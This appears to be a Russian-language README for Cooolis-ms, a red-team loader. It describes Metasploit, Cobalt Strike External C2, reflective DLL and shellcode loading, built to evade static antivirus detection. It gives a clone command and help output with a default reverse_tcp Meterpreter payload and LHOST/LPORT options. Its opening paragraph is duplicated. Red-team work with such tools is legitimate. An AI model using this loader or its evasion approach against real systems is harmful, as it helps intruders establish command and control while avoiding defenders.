
Cooolis-ms — это инструмент для выполнения кода, который включает в себя Metasploit Payload Loader, Cobalt Strike External C2 Loader и Reflective DLL injection. Его цель — обходить статические проверки для некоторого кода с характерными признаками, который мы собираемся выполнить, помогая членам красной команды быстрее и удобнее переключаться из среды веб-контейнера в среду C2 для дальнейшей работы.

Cooolis-ms — это инструмент для выполнения кода, включающий в себя Metasploit Payload Loader, Cobalt Strike External C2 Loader и Reflective DLL injection. Его цель — обходить статическое обнаружение некоторых кодов с характерными признаками, которые мы собираемся выполнять, помогая командам красных быстрее и удобнее переключаться из среды веб-контейнера в среду C2 для дальнейшей работы.
git clone https://github.com/Rvn0xsy/Cooolis-msCooolis-ms реализует функциональность клиента RPC-сервиса на основе документации Metasploit API, что позволяет серверу Cooolis-ms отправлять произвольные полезные нагрузки, повышая гибкость инструмента.Cooolis-ms заимствует подход MemoryModule для загрузки PE-файлов, что уменьшает характерные признаки выполнения и снижает вероятность обнаружения.Cooolis-ms заимствует ReflectiveDLLInjection для выполнения и внедрения рефлексивных DLL, что уменьшает характерные признаки выполнения и снижает вероятность обнаружения.Cooolis-ms реализует базовое выполнение External C2 на основе External C2 (Third-party Command and Control), что уменьшает характерные признаки выполнения и снижает вероятность обнаружения.Cooolis-ms также предусматривает использование файлов с серверов Aliyun OSS в качестве исполняемого кода, автоматическую загрузку в память и выполнение, что повышает гибкость инструмента.В настоящее время Cooolis-ms имеет следующие подкоманды:
[~\Documents\Cooolis-ms\Cooolis-ms-Loader\Release]> .\Cooolis-ms.exe -h
Version v1.2.6
Usage: C:\Users\Administrator\Documents\Cooolis-ms\Cooolis-ms-Loader\Release\Cooolis-ms.exe [OPTIONS] SUBCOMMAND
Options:
-h,--help Print this help message and exit
Subcommands:
metasploit Metasploit RPC Loader
cobaltstrike Cobalt Strike External C2 Loader
reflective Reflective DLL injection
shellcode Shellcode Loader
Для получения подробных параметров подкоманды добавьте -h/--help после неё:
[~\Documents\Cooolis-ms\Cooolis-ms-Loader\Release]> .\Cooolis-ms.exe metasploit -h
Metasploit RPC Loader
Usage: C:\Users\Administrator\Documents\Cooolis-ms\Cooolis-ms-Loader\Release\Cooolis-ms.exe metasploit [OPTIONS]
Options:
-h,--help Print this help message and exit
-p,--payload TEXT=windows/meterpreter/reverse_tcp
Payload Name, e.g. windows/meterpreter/reverse_tcp
-o,--options TEXT Payload options, e.g. LHOST=1.1.1.1,LPORT=8866
-P,--PORT UINT:INT in [1 - 65535]=8899 REQUIRED
RPC Server Port
-H,--HOST TEXT:IPV4 REQUIRED
RPC Server Host
Вы можете обратиться к этим материалам, чтобы написать свой собственный хороший проект:
Если вам понравился этот проект, поставьте мне Star~
Сообщить о проблеме или предложении